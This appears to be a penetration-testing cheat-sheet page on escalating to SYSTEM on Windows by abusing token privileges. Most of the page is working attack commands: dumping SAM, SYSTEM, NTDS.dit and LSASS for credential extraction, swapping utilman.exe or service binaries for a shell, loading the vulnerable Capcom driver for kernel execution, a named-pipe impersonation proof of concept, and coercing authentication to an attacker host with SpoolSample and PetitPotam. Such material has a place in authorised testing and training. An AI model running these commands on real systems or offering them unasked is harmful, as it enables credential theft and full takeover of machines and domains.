Documentation Index
Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
Use this file to discover all available pages before exploring further.
Overview
Certain Windows privileges allow escalation even without SeImpersonatePrivilege (covered in Potato Attacks).
Check Privileges
SeBackupPrivilege
Read any file on the system, including SAM/SYSTEM.
Dump SAM & SYSTEM
reg save HKLM\SAM C:\Temp\SAM
reg save HKLM\SYSTEM C:\Temp\SYSTEM
Read Protected Files via robocopy
robocopy /B C:\Users\Administrator\Desktop C:\Temp report.txt
Read NTDS.dit (Domain Controller)
Create script.txt:
set context persistent nowriters
add volume C: alias myvolume
create
expose %myvolume% Z:
diskshadow /s script.txt
robocopy /B Z:\Windows\NTDS C:\Temp ntds.dit
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
SeRestorePrivilege
Write any file on the system.
Replace System Binary
copy C:\Windows\System32\utilman.exe C:\Windows\System32\utilman.exe.bak
copy cmd.exe C:\Windows\System32\utilman.exe
Write to Protected Directories
# Enable privilege
Import-Module .\EnableSeRestorePrivilege.ps1
# Write payload
copy shell.dll C:\Windows\System32\target.dll
SeTakeOwnershipPrivilege
Take ownership of any object, then modify ACLs.
Take Ownership of File
takeown /f "C:\Windows\System32\config\SAM"
icacls "C:\Windows\System32\config\SAM" /grant %USERNAME%:F
copy C:\Windows\System32\config\SAM C:\Temp\
Take Ownership of Registry Key
takeown /f "HKLM\SYSTEM\CurrentControlSet\Services\VulnService" /r
Take Ownership of Service Binary
takeown /f "C:\Program Files\Service\app.exe"
icacls "C:\Program Files\Service\app.exe" /grant %USERNAME%:F
copy shell.exe "C:\Program Files\Service\app.exe"
SeLoadDriverPrivilege
Load kernel drivers. Can load vulnerable driver for kernel code execution.
https://github.com/FuzzySecurity/Capcom-Rootkit/
# Load driver
LoadDriver.exe System\CurrentControlSet\Capcom C:\Temp\Capcom.sys
# Exploit
ExploitCapcom.exe
SeDebugPrivilege
Attach to any process. Migrate into SYSTEM process.
Migrate via Meterpreter
meterpreter > ps
meterpreter > migrate <SYSTEM_PID>
Dump LSASS
procdump.exe -accepteula -ma lsass.exe lsass.dmp
Named Pipe Impersonation
Create a named pipe, trick a privileged process into connecting, impersonate its token.
PowerShell PoC
$pipe = New-Object System.IO.Pipes.NamedPipeServerStream("pwned", [System.IO.Pipes.PipeDirection]::InOut)
$pipe.WaitForConnection()
# Client connects → impersonate
$pipe.RunAsClient({ whoami })
SpoolSample / PetitPotam
Force machine account authentication to named pipe:
# SpoolSample (print spooler)
SpoolSample.exe TARGET ATTACKER
# PetitPotam (EFS)
python3 PetitPotam.py ATTACKER TARGET
Quick Reference
| Privilege | What You Can Do |
|---|
SeImpersonatePrivilege | Potato attacks → SYSTEM |
SeBackupPrivilege | Read any file (SAM, NTDS.dit) |
SeRestorePrivilege | Write any file (replace binaries) |
SeTakeOwnershipPrivilege | Own any object → modify ACLs |
SeLoadDriverPrivilege | Load kernel driver → kernel exec |
SeDebugPrivilege | Attach to SYSTEM process |
SeAssignPrimaryTokenPrivilege | Potato attacks → SYSTEM |